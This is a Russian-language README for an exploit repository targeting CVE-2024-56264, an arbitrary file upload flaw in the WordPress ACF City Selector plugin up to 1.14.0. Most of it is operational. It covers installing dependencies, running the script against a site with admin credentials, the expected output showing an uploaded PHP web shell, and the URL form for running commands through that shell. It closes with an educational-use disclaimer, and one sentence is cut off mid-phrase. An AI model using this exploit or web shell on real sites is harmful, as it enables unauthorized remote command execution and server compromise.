
Плагин WordPress ACF City Selector <= 1.14.0 - Уязвимость произвольной загрузки файлов
Этот репозиторий содержит эксплойт для CVE-2024-56264 — уязвимости произвольной загрузки файлов, обнаруженной в плагине WordPress ACF City Selector (версии <= 1.14.0). Эта уязвимость позволяет злоумышленнику загрузить вредоносный PHP-файл (веб-шелл) на уязвимый экземпляр WordPress и выполнять произвольные команды на сервере.
<= 1.14.0Плагин ACF City Selector некорректно проверяет загружаемые файлы, что позволяет злоумышленникам обходить ограничения и загружать произвольные PHP-файлы. После загрузки вредоносного PHP-файла злоумышленник может удалённо выполнять системные команды, что приводит к .
Перед запуском скрипта убедитесь, что установлены следующие компоненты:
requests (установка: pip install requests)Все необходимые зависимости можно установить с помощью:
pip install -r requirements.txt
Запуск эксплойта:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help show this help message and exit
--url URL Website base URL (e.g., http://192.168.100.74/wordpress)
--username USERNAME WordPress username
--password PASSWORD WordPress password
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
При успешной эксплуатации вы должны увидеть:
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
При успехе доступ к загруженному шеллу осуществляется по адресу:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
Это позволяет удалённо выполнять команды на сервере.
Данный скрипт предназначен только для образовательных и авторизованных тестов безопасности. Несанкционированное использование незаконно и может повлечь серьёзные последствия. Автор не несёт ответственности за любое неправомерное использование этого эксплойта.